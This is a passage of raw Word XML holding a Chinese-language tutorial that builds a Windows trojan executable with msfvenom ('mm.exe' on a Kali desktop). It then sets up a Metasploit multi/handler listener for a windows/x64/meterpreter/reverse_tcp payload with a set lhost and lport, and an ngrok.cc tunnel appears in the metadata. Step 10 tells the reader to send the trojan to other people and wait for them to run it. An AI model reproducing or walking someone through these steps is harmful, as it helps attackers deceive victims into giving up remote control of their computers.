        <w:t>lport=10001</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Cambria"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>-f</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Cambria"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Cambria"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>-o</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Cambria"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>/home/kali/Desktop/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>mm.exe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333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="434803F6" wp14:editId="3173B389">
            <wp:extent cx="5274310" cy="2145030"/>
            <wp:effectExtent l="0" t="0" r="2540" b="7620"/>
            <wp:docPr id="18265494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33333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333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="444444"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>开启监听，输入：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>use  exploit/multi/handler</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，使用监听模块。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333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>然后输入：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>set  payload  windows/x64/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meterpreter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reverse_tcp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，设置攻击载荷。</w:t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333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>输入：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>set  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lhost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  192.168.1.197</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，设置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ip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地址</w:t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333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>输入：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>set  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lport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  6666</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，设置端口号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hd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3CCCD83F" wp14:editId="22D3C685">
            <wp:extent cx="5274310" cy="2602230"/>
            <wp:effectExtent l="0" t="0" r="2540" b="7620"/>
            <wp:docPr id="15915210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hd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="444444"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>、木马发给别人，姜太公钓鱼，愿者上钩！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hd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1990C799" wp14:editId="4DC3D01E">
            <wp:extent cx="5274310" cy="1953895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
            <wp:docPr id="893038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FD0" w:rsidRPr="002C2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;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F0"/>
    <w:rsid w:val="002C26F0"/>
    <w:rsid w:val="005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4135"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{CB8CE280-7780-42EB-BD9B-D6C22D75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2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ngrok.cc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石成</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>蔡 石成</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-09-10T12:18:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-09-10T12:19:00Z</dcterms:modified>
</cp:coreProperties>
</file>